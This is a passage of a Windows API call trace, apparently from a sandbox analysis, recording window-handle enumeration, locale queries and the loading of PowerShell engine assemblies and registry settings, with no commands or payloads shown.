	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x564
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x548
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x518
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.084] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x508
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4ec
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x44c
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7ec
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x324
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.085] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4a0
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xcd0
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc50
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x6024a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc4c
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x60242, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc48
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x914
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x9b4
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x8fc
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xbc0
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xb0
	[0127.086] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x804
	[0127.086] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xbc8
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x854
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x140
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x55c
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x34c
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xb40
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x988
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x868
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x850
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x830
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x814
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x744
	[0127.087] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x2a8
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x534
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5e4
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5c4
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x58c
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x238
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x584
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7e8
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x678
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x35c
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x51c
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x360
	[0127.088] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x274
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x588
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0xc8
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x21c
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x664
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x334
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x5ec
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x550
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7a0
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x594
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x508
	[0127.089] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x4ec
	[0127.090] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x45c
	[0127.090] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x27d8a0 | out: lpdwProcessId=0x27d8a0) returned 0x7ec
	[0127.093] WerSetFlags () returned 0x0
	[0127.242] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0127.242] CoTaskMemFree (pv=0x0) 
	[0127.243] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x27dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x27dc00 | out: pulNumLanguages=0x27dc08, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x27dc00) returned 1
	[0127.243] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x27dc08, pwszLanguagesBuffer=0x2d56380, pcchLanguagesBuffer=0x27dc00 | out: pulNumLanguages=0x27dc08, pwszLanguagesBuffer=0x2d56380, pcchLanguagesBuffer=0x27dc00) returned 1
	[0127.248] CoTaskMemAlloc (cb=0x24) returned 0x19d9f0
	[0127.248] GetUserDefaultLocaleName (in: lpLocaleName=0x19d9f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0127.248] CoTaskMemFree (pv=0x19d9f0) 
	[0127.281] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.281] CoTaskMemFree (pv=0x18fd40) 
	[0127.424] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.424] CoTaskMemFree (pv=0x18fd40) 
	[0127.426] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.426] CoTaskMemFree (pv=0x18fd40) 
	[0127.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.435] SetErrorMode (uMode=0x1) returned 0x1
	[0127.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x27d880 | out: lpFileInformation=0x27d880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0127.435] SetErrorMode (uMode=0x1) returned 0x1
	[0127.435] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x27daf0 | out: lpdwHandle=0x27daf0) returned 0x94c
	[0127.436] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d59c10 | out: lpData=0x2d59c10) returned 1
	[0127.437] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27da68, puLen=0x27da60 | out: lplpBuffer=0x27da68*=0x2d59cac, puLen=0x27da60) returned 1
	[0127.437] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59d88, puLen=0x27d9d0) returned 1
	[0127.437] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0127.437] CoTaskMemAlloc (cb=0x2e) returned 0x197af0
	[0127.437] lstrcpyW (in: lpString1=0x197af0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0127.437] CoTaskMemFree (pv=0x197af0) 
	[0127.437] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59ddc, puLen=0x27d9d0) returned 1
	[0127.437] lstrlenW (lpString="System.Management.Automation") returned 28
	[0127.437] CoTaskMemAlloc (cb=0x3c) returned 0x1a1050
	[0127.437] lstrcpyW (in: lpString1=0x1a1050, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0127.437] CoTaskMemFree (pv=0x1a1050) 
	[0127.437] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59e38, puLen=0x27d9d0) returned 1
	[0127.437] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0127.437] CoTaskMemAlloc (cb=0x20) returned 0x19da50
	[0127.438] lstrcpyW (in: lpString1=0x19da50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0127.438] CoTaskMemFree (pv=0x19da50) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59e78, puLen=0x27d9d0) returned 1
	[0127.438] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0127.438] CoTaskMemAlloc (cb=0x44) returned 0x1a1050
	[0127.438] lstrcpyW (in: lpString1=0x1a1050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0127.438] CoTaskMemFree (pv=0x1a1050) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59ee0, puLen=0x27d9d0) returned 1
	[0127.438] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0127.438] CoTaskMemAlloc (cb=0x76) returned 0x124fe0
	[0127.438] lstrcpyW (in: lpString1=0x124fe0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0127.438] CoTaskMemFree (pv=0x124fe0) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59f7c, puLen=0x27d9d0) returned 1
	[0127.438] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0127.438] CoTaskMemAlloc (cb=0x44) returned 0x1a1050
	[0127.438] lstrcpyW (in: lpString1=0x1a1050, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0127.438] CoTaskMemFree (pv=0x1a1050) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59fe0, puLen=0x27d9d0) returned 1
	[0127.438] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0127.438] CoTaskMemAlloc (cb=0x58) returned 0x184cb0
	[0127.438] lstrcpyW (in: lpString1=0x184cb0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0127.438] CoTaskMemFree (pv=0x184cb0) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d5a05c, puLen=0x27d9d0) returned 1
	[0127.438] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0127.438] CoTaskMemAlloc (cb=0x20) returned 0x19da50
	[0127.438] lstrcpyW (in: lpString1=0x19da50, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0127.438] CoTaskMemFree (pv=0x19da50) 
	[0127.438] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x2d59d04, puLen=0x27d9d0) returned 1
	[0127.439] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0127.439] CoTaskMemAlloc (cb=0x66) returned 0x19b9e0
	[0127.439] lstrcpyW (in: lpString1=0x19b9e0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0127.439] CoTaskMemFree (pv=0x19b9e0) 
	[0127.439] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x0, puLen=0x27d9d0) returned 0
	[0127.439] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x0, puLen=0x27d9d0) returned 0
	[0127.439] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x27d9d8, puLen=0x27d9d0 | out: lplpBuffer=0x27d9d8*=0x0, puLen=0x27d9d0) returned 0
	[0127.439] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x27d9a8, puLen=0x27d9a0 | out: lplpBuffer=0x27d9a8*=0x2d59cac, puLen=0x27d9a0) returned 1
	[0127.439] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0127.439] VerLanguageNameW (in: wLang=0x0, szLang=0xe5880, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0127.439] CoTaskMemFree (pv=0xe5880) 
	[0127.439] VerQueryValueW (in: pBlock=0x2d59c10, lpSubBlock="\\", lplpBuffer=0x27d9f8, puLen=0x27d9f0 | out: lplpBuffer=0x27d9f8*=0x2d59c38, puLen=0x27d9f0) returned 1
	[0127.446] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.446] CoTaskMemFree (pv=0x18fd40) 
	[0127.451] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.451] CoTaskMemFree (pv=0x18fd40) 
	[0127.454] lstrlenW (lpString="䅁") returned 1
	[0127.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d8c8 | out: phkResult=0x27d8c8*=0x304) returned 0x0
	[0127.465] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d8b8 | out: phkResult=0x27d8b8*=0x308) returned 0x0
	[0127.465] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d948 | out: phkResult=0x27d948*=0x30c) returned 0x0
	[0127.469] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d88c, lpData=0x0, lpcbData=0x27d888*=0x0 | out: lpType=0x27d88c*=0x1, lpData=0x0, lpcbData=0x27d888*=0x56) returned 0x0
	[0127.470] CoTaskMemAlloc (cb=0x5a) returned 0x19b970
	[0127.470] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27d85c, lpData=0x19b970, lpcbData=0x27d858*=0x56 | out: lpType=0x27d85c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27d858*=0x56) returned 0x0
	[0127.470] CoTaskMemFree (pv=0x19b970) 
	[0127.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27d3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.751] CoTaskMemAlloc (cb=0x104) returned 0x18fd40
	[0127.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fd40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.751] CoTaskMemFree (pv=0x18fd40) 
	[0128.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0128.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0129.213] CoTaskMemAlloc (cb=0x104) returned 0x18fe50
	[0129.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.214] CoTaskMemFree (pv=0x18fe50) 
	[0129.215] CoTaskMemAlloc (cb=0x104) returned 0x18fe50
	[0129.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.215] CoTaskMemFree (pv=0x18fe50) 
	[0129.663] CoTaskMemAlloc (cb=0x104) returned 0x18fe50
	[0129.663] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.663] CoTaskMemFree (pv=0x18fe50) 
	[0129.665] CoTaskMemAlloc (cb=0x104) returned 0x18fe50
	[0129.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.665] CoTaskMemFree (pv=0x18fe50) 
	[0129.665] CoTaskMemAlloc (cb=0x104) returned 0x18fe50
	[0129.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x18fe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.665] CoTaskMemFree (pv=0x18fe50) 
	[0130.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
